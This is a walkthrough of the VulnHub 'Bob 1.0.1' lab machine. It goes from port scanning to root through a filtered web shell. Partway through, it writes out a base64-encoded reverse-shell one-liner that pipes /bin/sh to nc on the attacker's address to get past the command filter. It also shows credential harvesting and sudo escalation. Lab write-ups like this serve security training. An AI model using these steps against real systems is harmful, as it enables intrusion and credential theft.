VulnHub : Bob 1.0.1
27 June, 2021
Machine Link: https://www.vulnhub.com/entry/bob-101,226/
Starting off with an nmap scan
# nmap -A -sC -sV -O -p 1-65535 192.168.110.103
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.103
Host is up (0.00092s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 08:00:27:69:0E:18 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.92 ms 192.168.110.103
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.28 seconds
Out of the above paths, dev_shell.php was the most interesting one since I was able to run few commands on the machine through that
# curl 'http://192.168.110.103/dev_shell.php' --data-raw 'in_command=id'
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys
-Bob -->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
But a filter was being applied and certain commands were definitely blocked
$ curl 'http://192.168.110.103/dev_shell.php' --data-raw 'in_command=pwd'
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys
-Bob -->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
Get out skid lol
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
So I encoded the reverse shell command using base64 and in the input I gave the command to decode it and send to bash
echo -n cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xMTAuMTAyIDQyNDIgPi90bXAvZg== | base64 --decode | bash
This got me a reverse shell as www-data
# nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.110.102] from (UNKNOWN) [192.168.110.103] 39416
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
$ ls
WIP.jpg
about.html
contact.html
dev_shell.php
dev_shell.php.bak
dev_shell_back.png
index.html
index.html.bak
lat_memo.html
login.html
news.html
passwords.html
robots.txt
school_badge.png
$ pwd
/var/www/html
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:108:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus:x:109:112::/var/run/dbus:/bin/false
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:112:116:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:114:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:115:121::/var/lib/saned:/bin/false
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
Found a note inside bob's Documents
$ cat staff.txt
Seb:
Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him
James:
Does nothing
Pretty Lazy
Doesn't give a shit about his job
Elliot:
Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
There was also an encrypted file in there
$ ls -ltrha
total 20K
-rw-r--r-- 1 bob bob 300 Mar 4 2018 staff.txt
drwxr-xr-x 3 bob bob 4.0K Mar 5 2018 Secret
-rw-r--r-- 1 bob bob 91 Mar 5 2018 login.txt.gpg
drwxr-xr-x 3 bob bob 4.0K Mar 5 2018 .
drwxr-xr-x 18 bob bob 4.0K Mar 8 2018 ..
$ file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)
Going deeper in the directory Secret, there is a bash file called notes.sh
$ ./notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
Inside elliot's home directory I found a file containing a password using which I switched to elliot
$ cat theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to
theadminisdumb
I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.
www-data@Milburg-High:/home/elliot$ su elliot
su elliot
Password: theadminisdumb
elliot@Milburg-High:~$ whoami
whoami
elliot
I found another file in bob's home directory with some passwords
elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
At this point, bob was the only user whose password I didn't have. I had checked throughout most directories, and other common enumeration points. The only thing I came to know was all these users were allowed to run certain commands using sudo without a password
seb@Milburg-High:/home/bob/Documents$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
Matching Defaults entries for seb on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User seb may run the following commands on Milburg-High:
(ALL) NOPASSWD: /usr/bin/service apache2 *
(root) NOPASSWD: /bin/systemctl start ssh
At a dead end, I took hint from the available writeups, and it turns out that the password for the encrypted file can be formed using the notes.sh file. The first letter of each line when combined will be the password. This method is called an acrostic cipher
seb@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ./notes.sh | tail -11 | cut -c1
H
A
R
P
O
C
R
A
T
E
S
seb@Milburg-High:/home/bob/Documents$ gpg --decrypt login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
seb@Milburg-High:/home/bob/Documents$ su bob
Password:
bob@Milburg-High:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
bob@Milburg-High:~$ whoami
bob
Bob is allowed to run anything as sudo so switching to root was straightforward
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
bob@Milburg-High:~$ sudo su
sudo: unable to resolve host Milburg-High: Connection refused
root@Milburg-High:/home/bob# id
uid=0(root) gid=0(root) groups=0(root)
root@Milburg-High:/home/bob# whoami
root
root@Milburg-High:/home/bob# cd /
root@Milburg-High:/# ls
bin dev flag.txt initrd.img lib lost+found mnt proc run srv tmp var vmlinuz.old
boot etc home initrd.img.old lib64 media opt root sbin sys usr vmlinuz
root@Milburg-High:/# cat flag.txt
CONGRATS ON GAINING ROOT
.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t